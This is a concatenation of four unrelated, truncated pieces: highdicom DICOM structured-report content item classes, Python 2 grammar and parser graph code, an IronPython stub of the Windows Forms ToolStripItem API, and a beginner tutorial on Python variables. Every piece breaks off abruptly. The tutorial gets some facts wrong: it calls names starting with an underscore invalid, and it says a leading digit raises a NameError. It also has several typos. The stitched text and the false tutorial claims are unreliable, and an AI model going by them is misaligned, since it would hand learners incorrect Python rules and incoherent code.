pydicom.sr.coding.Code] coded value or an enumerated item representing a coded value relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(CodeContentItem, self).__init__( ValueTypeValues.CODE, name, relationship_type ) if not isinstance(value, (CodedConcept, Code, )): raise TypeError( 'Argument "value" must have type CodedConcept or Code.' ) if isinstance(value, Code): value = CodedConcept(*value) self.ConceptCodeSequence = [value] class PnameContentItem(ContentItem): """DICOM SR document content item for value type PNAME.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, PersonName], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, pydicom.valuerep.PersonName] name of the person relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(PnameContentItem, self).__init__( ValueTypeValues.PNAME, name, relationship_type ) self.PersonName = PersonName(value) class TextContentItem(ContentItem): """DICOM SR document content item for value type TEXT.""" def __init__( self, name: Union[Code, CodedConcept], value: str, relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: str description of the concept in free text relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(TextContentItem, self).__init__( ValueTypeValues.TEXT, name, relationship_type ) self.TextValue = str(value) class TimeContentItem(ContentItem): """DICOM SR document content item for value type TIME.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, datetime.time, TM], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, datetime.time, pydicom.valuerep.TM] time relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(TimeContentItem, self).__init__( ValueTypeValues.TIME, name, relationship_type ) self.Time = TM(value) class DateContentItem(ContentItem): """DICOM SR document content item for value type DATE.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, datetime.date, DA], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, datetime.date, pydicom.valuerep.DA] date relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(DateContentItem, self).__init__( ValueTypeValues.DATE, name, relationship_type ) self.Date = DA(value) class DateTimeContentItem(ContentItem): """DICOM SR document content item for value type DATETIME.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, datetime.datetime, DT], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[str, datetime.datetime, pydicom.valuerep.DT] datetime relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(DateTimeContentItem, self).__init__( ValueTypeValues.DATETIME, name, relationship_type ) self.DateTime = DT(value) class UIDRefContentItem(ContentItem): """DICOM SR document content item for value type UIDREF.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[str, UID], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[pydicom.uid.UID, str] unique identifier relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item """ # noqa super(UIDRefContentItem, self).__init__( ValueTypeValues.UIDREF, name, relationship_type ) self.UID = value class NumContentItem(ContentItem): """DICOM SR document content item for value type NUM.""" def __init__( self, name: Union[Code, CodedConcept], value: Optional[Union[int, float]] = None, unit: Optional[Union[Code, CodedConcept]] = None, qualifier: Optional[Union[Code, CodedConcept]] = None, relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[int, float], optional numeric value unit: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code], optional coded units of measurement (see `CID 7181 <http://dicom.nema.org/medical/dicom/current/output/chtml/part16/sect_CID_7181.html>`_ "Abstract Multi-dimensional Image Model Component Units") qualifier: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code], optional qualification of numeric value or as an alternative to numeric value, e.g., reason for absence of numeric value (see `CID 42 <http://dicom.nema.org/medical/dicom/current/output/chtml/part16/sect_CID_42.html>`_ "Numeric Value Qualifier" for options) relationship_type: Union[highdicom.sr.enum.RelationshipTypeValues, str], optional type of relationship with parent content item Note ---- Either `value` and `unit` or `qualifier` must be specified. """ # noqa super(NumContentItem, self).__init__( ValueTypeValues.NUM, name, relationship_type ) if value is not None: self.MeasuredValueSequence: List[Dataset] = [] measured_value_sequence_item = Dataset() if not isinstance(value, (int, float, )): raise TypeError( 'Argument "value" must have type "int" or "float".' ) measured_value_sequence_item.NumericValue = value if isinstance(value, float): measured_value_sequence_item.FloatingPointValue = value if not isinstance(unit, (CodedConcept, Code, )): raise TypeError( 'Argument "unit" must have type CodedConcept or Code.' ) if isinstance(unit, Code): unit = CodedConcept(*unit) measured_value_sequence_item.MeasurementUnitsCodeSequence = [unit] self.MeasuredValueSequence.append(measured_value_sequence_item) elif qualifier is not None: if not isinstance(qualifier, (CodedConcept, Code, )): raise TypeError( 'Argument "qualifier" must have type "CodedConcept" or ' '"Code".' ) if isinstance(qualifier, Code): qualifier = CodedConcept(*qualifier) self.NumericValueQualifierCodeSequence = [qualifier] else: raise ValueError( 'Either argument "value" or "qualifier" must be specified ' 'upon creation of NumContentItem.' ) class ContainerContentItem(ContentItem): """DICOM SR document content item for value type CONTAINER.""" def __init__( self, name: Union[Code, CodedConcept], is_content_continuous: bool = True, template_id: Optional[str] = None, relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name is_content_continous: bool, optional whether contained content items are logically linked in a continuous manner or separate items (default: ``True``) template_id: str, optional SR template identifier relationship_type: str, optional type of relationship with parent
import typesystem import warnings import graphviz from collections import defaultdict class Atom(object): def __init__(self): super(Atom, self).__init__() self.sync = dict() self.expects = set() def get_nullable(self): return None def get_sync(self): return self.sync def __repr__(self): return self.name class ExpectedName: def __init__(self, name): self.name = name def __hash__(self): return hash(self.name) def __eq__(self, other): return self.name == other.name def __repr__(self): return self.name class Rule: def __init__(self, id, sequence): self.id = id self.sequence = sequence def is_nullable(self): def reducer(seq, atom): if seq == None: return None atom_seq = atom.get_nullable() if atom_seq == None: return None return seq + atom_seq return reduce(reducer, self.sequence, []) def get_rule_ids(rule): ids = defaultdict(lambda : 0) for atom in rule: if isinstance(atom, RuleIdentity): ids[atom] = ids[atom] + 1 return ids class GraphNode(object): def __init__(self): super(GraphNode, self).__init__() self.inedges = [] self.outedges = [] self.outpaths = [] self.inpaths = [] self.marked = False self.name = "empty" self.accessible = set() self.ancestors = set() self.graph = None self.processed = False def is_empty_node(self): return False def add_to_graph(self, graph): self.graph = graph self.add_node(graph) for edge in self.inedges: self.add_edge_to_graph(edge, self.graph) def add_edge_to_graph(self, edge, graph): label = "" #str(list(get_rule_ids(edge.rule).iterkeys())) graph.edge(str(edge.outv), str(edge.inv), label) def add_node(self, graph): graph.node(str(self), str(self)) def __repr__(self): return self.name def make_edges(self): for rule in self.rules: lhs = [] for (index,atom) in enumerate(rule): if isinstance(atom, GraphNode): edge = Edge(atom, self, lhs + rule[index:]) self.inedges.append(edge) if self.graph != None: self.add_edge_to_graph(edge, self.graph) atom.outedges.append(edge) nullable = atom.get_nullable() if nullable == None: lhs = None break lhs.extend(nullable) class EmptyGraphNode(GraphNode): def __init__(self): super(EmptyGraphNode, self).__init__() def is_empty_node(self): return True EmptyNode = EmptyGraphNode() class Terminal(Atom,GraphNode): def __init__(self, name): super(Terminal, self).__init__() self.name = name self.type = typesystem.TypeVar(self.name) self.sync = dict([(self, (0, [self])), (None, (1, [self]))]) self.expects = set([self]) self.processed = True def add_node(self, graph): graph.node(str(self), str(self), fillcolor="turquoise", style="filled") def get_id(self): if hasattr(self, "id"): return self.id return self.name class LoopPath(Atom,GraphNode): def __init__(self, node): super(LoopPath, self).__init__() self.node = node self.sync = dict() self.name = "%s loop" % (self.node) self.processed = False def add_node(self, graph): graph.node(str(self), str(self), fillcolor="coral", style="filled") def do_work(self, grammar): paths = [] for edge in self.node.outedges: if edge.inv == self.node: paths.append(path_extend(([], [], self.node), (edge.rule, self.node))) elif self.node in edge.inv.accessible: prepath = path_extend(([], [], self.node), (edge.rule, edge.inv)) path = find_path(grammar, edge.inv, self.node) paths.append(paths_concat(prepath, path)) self.rules = [] for (lhs,rhs,prod) in paths: if len(lhs) > 0: warnings.warn("Loop action %s ignored" % rhs) else: self.rules.append(rhs + [self]) self.rules.append([]) self.nullable = [] def get_nullable(self): return self.nullable class SplitPath(Atom,GraphNode): def __init__(self, start, end): super(SplitPath, self).__init__() self.name = "(%s->%s)" % (start, end) self.start = start self.sync = dict() self.end = end self.nullable = None def add_node(self, graph): graph.node(str(self), str(self), fillcolor="pink", style="filled") def do_work(self, grammar): paths = [] for edge in self.start.outedges: if (self.end in edge.inv.accessible or self.end == edge.inv) and (edge.inv != self.start): path = find_path(grammar, edge.inv, self.end) if not edge.inv.processed: raise RuntimeError("Attempting to process node while dependencies are not processed") rhs = [grammar.get_loop(edge.inv)] if edge.inv in edge.inv.accessible else [] prepath = path_extend(([], [], self.start), (edge.rule + rhs, edge.inv)) paths.append(paths_concat(prepath, path)) self.rules = [] for (lhs,rhs,prod) in paths: if len(lhs)> 0: warnings.warn("Split action %s ignored (while processing %s)" % ((lhs, rhs), self)) else: ids = get_rule_ids(rhs) if any(map(lambda k : k > 1, ids.itervalues())): warnings.warn("Split action %s ignored (rule repetition) (while processing %s)" % (rhs, self)) else: self.rules.append(rhs) def get_nullable(self): return self.nullable class NonTerminal(Atom, GraphNode): def __init__(self, name, expected_name): super(NonTerminal, self).__init__() self.sync = dict() self.name = name self.type = typesystem.TypeVar(self.name) self.nullable = None self.rules = [] self.processed = False if expected_name != None: self.expects = frozenset([expected_name]) def add_node(self, graph): graph.node(str(self), str(self), fillcolor="lawngreen", style="filled") def add_rule(self, id, rule, action): total_rule = rule + [action, id] self.rules.append(total_rule) def get_nullable(self): return self.nullable class Edge: def __init__(self, outv, inv, rule): self.outv = outv self.inv = inv self.rule = rule class RuleIdentity(Atom): def __init__(self, text): super(RuleIdentity, self).__init__() self.text = text self.sync = dict([(None, (0, []))]) self.processed = True def get_nullable(self): return [self] def __repr__(self): return "(%s)" % self.text def instance(self): return RuleIdentity(self.text) class Action(Atom): def __init__(self, type, code): super(Action, self).__init__() self.type = type self.code = code self.sync = dict([(None, (0, [self]))]) self.processed = True def get_nullable(self): return [self] def __repr__(self): return "(%s){" % (self.type) + self.code + "}" class Grammar: def __init__(self): self.terminals = dict() self.non_terminals = [] self.loops = dict() self.splits = dict() self.worklist = [] self.graph = graphviz.Digraph(engine="dot") def add_nt(self, nt): self.non_terminals.append(nt) nt.add_to_graph(self.graph) def get_terminal(self, name): if name not in self.terminals: terminal = Terminal(name) self.terminals[name] = terminal terminal.add_to_graph(self.graph) return self.terminals[name] def get_split(self, start, end): if (start,end) not in self.splits: splitPath = SplitPath(start, end) self.splits[(start,end)] = splitPath self.worklist.append(splitPath) splitPath.add_to_graph(self.graph) return self.splits[(start,end)] def get_loop(self, node): if node not in self.loops: loopPath = LoopPath(node) self.loops[node] = loopPath self.worklist.append(loopPath) loopPath.add_to_graph(self.graph) return self.loops[node] def do_work(self): def iterate_local(fn, list): while any(map(fn, list)): pass worklist = [] while len(self.worklist) > 0: newlist = self.worklist worklist.extend(newlist) self.worklist = [] for atom in newlist: atom.do_work(self) iterate_local(update_nullable, worklist) for atom in worklist: atom.make_edges() for atom in worklist: find_transitive_closure(atom) iterate_local(update_sync, worklist) iterate_local(update_expected, worklist) def iterate(self, fn): while any(map(fn, self.non_terminals)): pass def make_edges(self): for nt in self.non_terminals: nt.make_edges() def compare_sync(sync1, sync2): if len(sync1) != len(sync2): return False for k,(cost,rule) in sync1.iteritems(): if k not in sync2: return False if sync2[k][0] != cost: return False return True def eval_nullable(nt): nullables = map(lambda rule : Rule(None, rule).is_nullable(), nt.rules) for nullable in nullables: if nullable != None: return nullable return None def rule_expected(rule): expected = set() for atom in rule: expected.update(atom.expects) if atom.get_nullable() == None: break return expected def eval_expected(nt): if isinstance(nt.expects, frozenset): return nt.expects return reduce(lambda s, rule : s.union(rule_expected(rule)), nt.rules, set()) def update_expected(nt): expected = eval_expected(nt) if expected != nt.expects: nt.expects = expected return True return False def eval_sync_set(nt): sync = dict() for rule in nt.rules: skip_rule = [] skip_cost = 0 for index, atom in enumerate(rule): atom_sync = atom.get_sync() for (term,(cost,syncrule)) in atom_sync.iteritems(): if term != None and (term not in sync or skip_cost + cost < sync[term][0]): sync[term] = (skip_cost + cost, skip_rule + syncrule + rule[index + 1:]) if None in atom_sync: skip_cost = skip_cost + atom_sync[None][0] skip_rule.extend(atom_sync[None][1]) else: skip_rule = None break if skip_rule <> None: if None not in sync or sync[None][0] > skip_cost: sync[None] = (skip_cost, skip_rule) return sync def update_sync(nt): sync = eval_sync_set(nt) if not compare_sync(sync, nt.sync): nt.sync = sync return True return False def update_nullable(nt): if nt.get_nullable() == None: nt.nullable = eval_nullable(nt) if nt.nullable != None: return True return False def find_transitive_closure(nt): def visit_dfs(root, atom): for edge in atom.inedges: if edge.outv not in root.ancestors: root.ancestors.add(edge.outv) edge.outv.accessible.add(root) visit_dfs(root, edge.outv) visit_dfs(nt, nt) nt.processed = True class DominatorSet: def __init__(self, start, end): all_set = set() def find_nodes(all_set, v): if v not in all_set: all_set.add(v) for ov in v.accessible: if end in ov.accessible or end == ov: find_nodes(all_set, ov) find_nodes(all_set, start) doms = dict() doms[start] = set([start]) for v in all_set: if v != start: doms[v] = all_set.copy() changes = True while changes: changes = False for v in all_set: if v != start: new_set = all_set.copy() for edge in v.inedges: iv = edge.outv if iv in all_set: new_set.intersection_update(doms[iv]) new_set.add(v) if new_set != doms[v]: changes = True doms[v] = new_set self.doms = doms self.idoms = dict() for v in all_set: for dom in self.doms[v]: if dom != v: idom = True for dom1 in self.doms[v]: if dom1 != v and self.is_sdom(dom, dom1): idom = False if idom: self.idoms[v] = dom def is_dom(self, start, end): return start in self.doms[end] def is_sdom(self, start, end): return start in self.doms[end] and start != end def get_idom(self, node): return self.idoms[node] if node in self.idoms else None def get_dominators(self, node): return self.doms[node] def path_extend(path, rule_prod): (lhs, rhs, root) = path (rule, prod) = rule_prod if root.is_empty_node(): rule_lhs = [] rule_rhs = rule[:] else: pos = rule.index(root) rule_lhs = filter(lambda t : not isinstance(t, RuleIdentity), rule[:pos]) rule_rhs = rule[pos+1:] root = prod lhs = rule_lhs + lhs rhs = rhs + rule_rhs return (lhs, rhs, root) def paths_concat(l, r): (llhs, lrhs, lroot) = l (rlhs, rrhs, rroot) = r return (rlhs + llhs, lrhs + rrhs, rroot) def find_path(grammar, start, end): seq = [] dom = DominatorSet(start, end) cur = end while cur
An System.EventArgs that contains the event data. """ pass def PerformClick(self): """ PerformClick(self: ToolStripItem) Activates the System.Windows.Forms.ToolStripItem when it is clicked with the mouse. """ pass def ProcessCmdKey(self,*args): """ ProcessCmdKey(self: ToolStripItem,m: Message,keyData: Keys) -> (bool,Message) Processes a command key. m: A System.Windows.Forms.Message,passed by reference,that represents the window message to process. keyData: One of the System.Windows.Forms.Keys values that represents the key to process. Returns: false in all cases. """ pass def ProcessDialogKey(self,*args): """ ProcessDialogKey(self: ToolStripItem,keyData: Keys) -> bool Processes a dialog key. keyData: One of the System.Windows.Forms.Keys values that represents the key to process. Returns: true if the key was processed by the item; otherwise,false. """ pass def ProcessMnemonic(self,*args): """ ProcessMnemonic(self: ToolStripItem,charCode: Char) -> bool Processes a mnemonic character. charCode: The character to process. Returns: true in all cases. """ pass def ResetBackColor(self): """ ResetBackColor(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetDisplayStyle(self): """ ResetDisplayStyle(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetFont(self): """ ResetFont(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetForeColor(self): """ ResetForeColor(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetImage(self): """ ResetImage(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetMargin(self): """ ResetMargin(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetPadding(self): """ ResetPadding(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetRightToLeft(self): """ ResetRightToLeft(self: ToolStripItem) This method is not relevant to this class. """ pass def ResetTextDirection(self): """ ResetTextDirection(self: ToolStripItem) This method is not relevant to this class. """ pass def Select(self): """ Select(self: ToolStripItem) Selects the item. """ pass def SetBounds(self,*args): """ SetBounds(self: ToolStripItem,bounds: Rectangle) Sets the size and location of the item. bounds: A System.Drawing.Rectangle that represents the size and location of the System.Windows.Forms.ToolStripItem """ pass def SetVisibleCore(self,*args): """ SetVisibleCore(self: ToolStripItem,visible: bool) Sets the System.Windows.Forms.ToolStripItem to the specified visible state. visible: true to make the System.Windows.Forms.ToolStripItem visible; otherwise,false. """ pass def ToString(self): """ ToString(self: ToolStripItem) -> str Returns: A System.String containing the name of the System.ComponentModel.Component,if any,or null if the System.ComponentModel.Component is unnamed. """ pass def __enter__(self,*args): """ __enter__(self: IDisposable) -> object Provides the implementation of __enter__ for objects which implement IDisposable. """ pass def __exit__(self,*args): """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) Provides the implementation of __exit__ for objects which implement IDisposable. """ pass def __init__(self,*args): """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod def __new__(self,*args): #cannot find CLR constructor """ __new__(cls: type) __new__(cls: type,text: str,image: Image,onClick: EventHandler) __new__(cls: type,text: str,image: Image,onClick: EventHandler,name: str) """ pass def __str__(self,*args): pass AccessibilityObject=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the System.Windows.Forms.AccessibleObject assigned to the control. Get: AccessibilityObject(self: ToolStripItem) -> AccessibleObject """ AccessibleDefaultActionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the default action description of the control for use by accessibility client applications. Get: AccessibleDefaultActionDescription(self: ToolStripItem) -> str Set: AccessibleDefaultActionDescription(self: ToolStripItem)=value """ AccessibleDescription=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the description that will be reported to accessibility client applications. Get: AccessibleDescription(self: ToolStripItem) -> str Set: AccessibleDescription(self: ToolStripItem)=value """ AccessibleName=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the name of the control for use by accessibility client applications. Get: AccessibleName(self: ToolStripItem) -> str Set: AccessibleName(self: ToolStripItem)=value """ AccessibleRole=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the accessible role of the control,which specifies the type of user interface element of the control. Get: AccessibleRole(self: ToolStripItem) -> AccessibleRole Set: AccessibleRole(self: ToolStripItem)=value """ Alignment=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the item aligns towards the beginning or end of the System.Windows.Forms.ToolStrip. Get: Alignment(self: ToolStripItem) -> ToolStripItemAlignment Set: Alignment(self: ToolStripItem)=value """ AllowDrop=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether drag-and-drop and item reordering are handled through events that you implement. Get: AllowDrop(self: ToolStripItem) -> bool Set: AllowDrop(self: ToolStripItem)=value """ Anchor=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the edges of the container to which a System.Windows.Forms.ToolStripItem is bound and determines how a System.Windows.Forms.ToolStripItem is resized with its parent. Get: Anchor(self: ToolStripItem) -> AnchorStyles Set: Anchor(self: ToolStripItem)=value """ AutoSize=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the item is automatically sized. Get: AutoSize(self: ToolStripItem) -> bool Set: AutoSize(self: ToolStripItem)=value """ AutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether to use the System.Windows.Forms.ToolStripItem.Text property or the System.Windows.Forms.ToolStripItem.ToolTipText property for the System.Windows.Forms.ToolStripItem ToolTip. Get: AutoToolTip(self: ToolStripItem) -> bool Set: AutoToolTip(self: ToolStripItem)=value """ Available=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem should be placed on a System.Windows.Forms.ToolStrip. Get: Available(self: ToolStripItem) -> bool Set: Available(self: ToolStripItem)=value """ BackColor=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the background color for the item. Get: BackColor(self: ToolStripItem) -> Color Set: BackColor(self: ToolStripItem)=value """ BackgroundImage=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the background image displayed in the item. Get: BackgroundImage(self: ToolStripItem) -> Image Set: BackgroundImage(self: ToolStripItem)=value """ BackgroundImageLayout=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the background image layout used for the System.Windows.Forms.ToolStripItem. Get: BackgroundImageLayout(self: ToolStripItem) -> ImageLayout Set: BackgroundImageLayout(self: ToolStripItem)=value """ Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the size and location of the item. Get: Bounds(self: ToolStripItem) -> Rectangle """ CanRaiseEvents=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether the component can raise an event. """ CanSelect=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether the item can be selected. Get: CanSelect(self: ToolStripItem) -> bool """ ContentRectangle=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the area where content,such as text and icons,can be placed within a System.Windows.Forms.ToolStripItem without overwriting background borders. Get: ContentRectangle(self: ToolStripItem) -> Rectangle """ DefaultAutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether to display the System.Windows.Forms.ToolTip that is defined as the default. """ DefaultDisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating what is displayed on the System.Windows.Forms.ToolStripItem. """ DefaultMargin=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the default margin of an item. """ DefaultPadding=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the internal spacing characteristics of the item. """ DefaultSize=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the default size of the item. """ DesignMode=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode. """ DismissWhenClicked=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets a value indicating whether items on a System.Windows.Forms.ToolStripDropDown are hidden after they are clicked. """ DisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets whether text and images are displayed on a System.Windows.Forms.ToolStripItem. Get: DisplayStyle(self: ToolStripItem) -> ToolStripItemDisplayStyle Set: DisplayStyle(self: ToolStripItem)=value """ Dock=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets which System.Windows.Forms.ToolStripItem borders are docked to its parent control and determines how a System.Windows.Forms.ToolStripItem is resized with its parent. Get: Dock(self: ToolStripItem) -> DockStyle Set: Dock(self: ToolStripItem)=value """ DoubleClickEnabled=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem can be activated by double-clicking the mouse. Get: DoubleClickEnabled(self: ToolStripItem) -> bool Set: DoubleClickEnabled(self: ToolStripItem)=value """ Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets a value indicating whether the parent control of the System.Windows.Forms.ToolStripItem is enabled. Get: Enabled(self: ToolStripItem) -> bool Set: Enabled(self: ToolStripItem)=value """ Events=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets the list of event handlers that are attached to this System.ComponentModel.Component. """ Font=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the font of the text displayed by the item. Get: Font(self: ToolStripItem) -> Font Set: Font(self: ToolStripItem)=value """ ForeColor=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the foreground color of the item. Get: ForeColor(self: ToolStripItem) -> Color Set: ForeColor(self: ToolStripItem)=value """ Height=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the height,in pixels,of a System.Windows.Forms.ToolStripItem. Get: Height(self: ToolStripItem) -> int Set: Height(self: ToolStripItem)=value """ Image=property(lambda self: object(),lambda self,v: None,lambda self: None) """Gets or sets the image that is displayed on a System.Windows.Forms.ToolStripItem. Get: Image(self: ToolStripItem) -> Image Set: Image(self: ToolStripItem)=value """ ImageAlign=property(lambda
# Variables When programming in Python, you'll become very comfortable with creating variables. This is because *everything* in Python is implemented as an **object**. This means that whether you're working wither numbers, words, or booleans (we'll talk about these soon!, you're working with object.s These objects are stored in what we call **variables**. In this chapter, we'll introduce how to define variables, a few different *types* of variables, and get you working with variables in Python. ## Defining Variables Variables are defined with a single equals sign (`=`). When variables are defined, we say that they are **assigned**. This is because, the information you want the variable to store (the information to the right of the `=`) is *assigned* to the variable (the thing on the left). This will always be true in Python - the variable will be to the left of the `=` and the information you want it to store on the right. You can think of variables like a container. Containers store things, the same way variables store information. The label on the container is similar to the *name* of the variable. For example, let's define our first variable! <div class="alert alert-success"> In programming, variables are things that store values. <b>Variables</b> are defined with <code>name = value</code>. </div> # define the variable 'var_1' var_1 = 6 With our container analogy, the variable `var_1` is the container. Like containers, variables store some information. The information stored in `var_1` is, in this case, the number 6. So, the name of the variable is `var_1` and the information assigned to it (or stored in it) is the number 6. You can store lots of different *types* of inrormation in variables. We'll discuss a few of them in this chapter and introduce even more later. For example, variables can store words or letters, as you see here: # define the variable 'var_2' var_2 = 'string' This second variable - `var2` - has a different name than our first variable and stores different information. Here, it stores the word 'string'. We'll get to the different *types* of variables in just a second. ## Code Variables != Math Variables An important point to discuss is that many people are familiar with the word **variable** from mathematics. However, variables in *code* are not the same thing as variables in math. For example, in mathematics `=` refers to equality. It's a *statement of truth*. It states that whatever is to the left of the `=` is equal to whatever is to the right of the `=`. This is not the case when it comes to code. Instead, `=` refers to assignment. It states that whatever is to the right of the `=` should be assigned - *or stored in* the variable to the left. For example, when it comes to mathematics and algebra, we're familiar with the concept of solving for x. If you were asked 'What is $x$?' and given the expression $y = x + 2$, you would subtract 2 from the right side so that $x = y -2$. The same logic does *not* follow in programming. For example, if you were asked 'What is `x`?' and given the following two lines of code: ```python x = 2 x = x + 1 ``` you would tell me that `x` is 1 more than its previous value of 2, so `x = 3`. That line of code there: `x = x + 1` wouldn't make sense in mathematics, but it makes perfect sense in code. This is because code variables use `=` for assignment, and not as a statement of truth and equality. ### Reminders - In programming `=` means assignment - Anything to the right of the `=` is evaluated before assignment - Names are always on the left of the `=`, values are always on the right ## Naming Variables So far, we've only defined a few variables, and we haven't yet specified the *rules* for variable assignment. There are a whole bunch of options for how you name your variables and only a few rules. The rules are: 1. Names are case sensitive 2. Variables must start with letters - After that, they can include numbers, and underscores - They cannot include special characters (like &, *, #, etc) 3. Python doesn't care what you name your variables - Humans do care. Pick names that describe the data / value that they store ### Names are case-sensitive In programming, capitalization matters *a lot*. `VAR_1` and `var_1` are interpreted as two *different* variables when it comes to code. Be mindful of capitalization. Capital and lower-case letters are interpreted by the computer as two different characters. ### Variables must start with letters We saw that variables can contain numbers and underscores when we created `var_1` earlier, and while they can *contain* numbers or underscores, they cannot *begin* with anything other than a letter. So, `_var1` or `1_var` would not be acceptable variable names. If you try to create a variable that starts with anything other than a letter, Python will give you a `NameError`. Additionally, Python does not allow variables names to contain a few special characters (ie. &, \*, #, etc). If you try to create a variable with a special character, Python will give you a `SyntaxError`. Thus, it's best to limit variable names to include letters, underscores, and numbers. ### Python doesn't care what you name your variables Python doesn't care whether your variable name is `a` or `heights`; however, humans do. So, pick variable names that are informative about the information stored within the variable. For example, `a` doesn't clue the human reader of the code into what information is stored in the variable. However, `heights` lets the person reading the code (which could be you in the future or someone else). ## Reserved Words Beyond those three rules, here are 33 words that are not allowed to be used for variable assignment in Python. These are words that have a particular meaning in Python and thus you're not allowed to use them for variable assignment. If you try to define a variable with one of these names, you'll get a `SyntaxError`. <table type="text/css"> <tr> <td><code>False</code></td> <td><code>None</code></td> <td><code>True</code></td> <td><code>and</code></td> <td><code>as</code></td> <td><code>assert</code></td> <td><code>break</code></td> </tr> <tr> <td><code>class</code></td> <td><code>continue</code></td> <td><code>def</code></td> <td><code>del</code></td> <td><code>elif</code></td> <td><code>else</code></td> <td><code>except</code></td> </tr> <tr> <td><code>finally</code></td> <td><code>for</code></td> <td><code>from</code></td> <td><code>global</code></td> <td><code>if</code></td> <td><code>import</code></td> <td><code>in</code></td> </tr> <tr> <td><code>is</code></td> <td><code>lambda</code></td> <td><code>nonlocal</code></td> <td><code>not</code></td> <td><code>or</code></td> <td><code>pass</code></td> <td><code>raise</code></td> </tr> <tr> <td><code>return</code></td> <td><code>try</code></td> <td><code>while</code></td> <td><code>with</code></td> <td><code>yield</code></td> </tr> </table> # you will get an error if you try to assign a variable to one of these words try = 6 ## How Code Executes So far we've been writing and executing code within a Jupyter notebook. But, what does that mean? What is the notebook and how 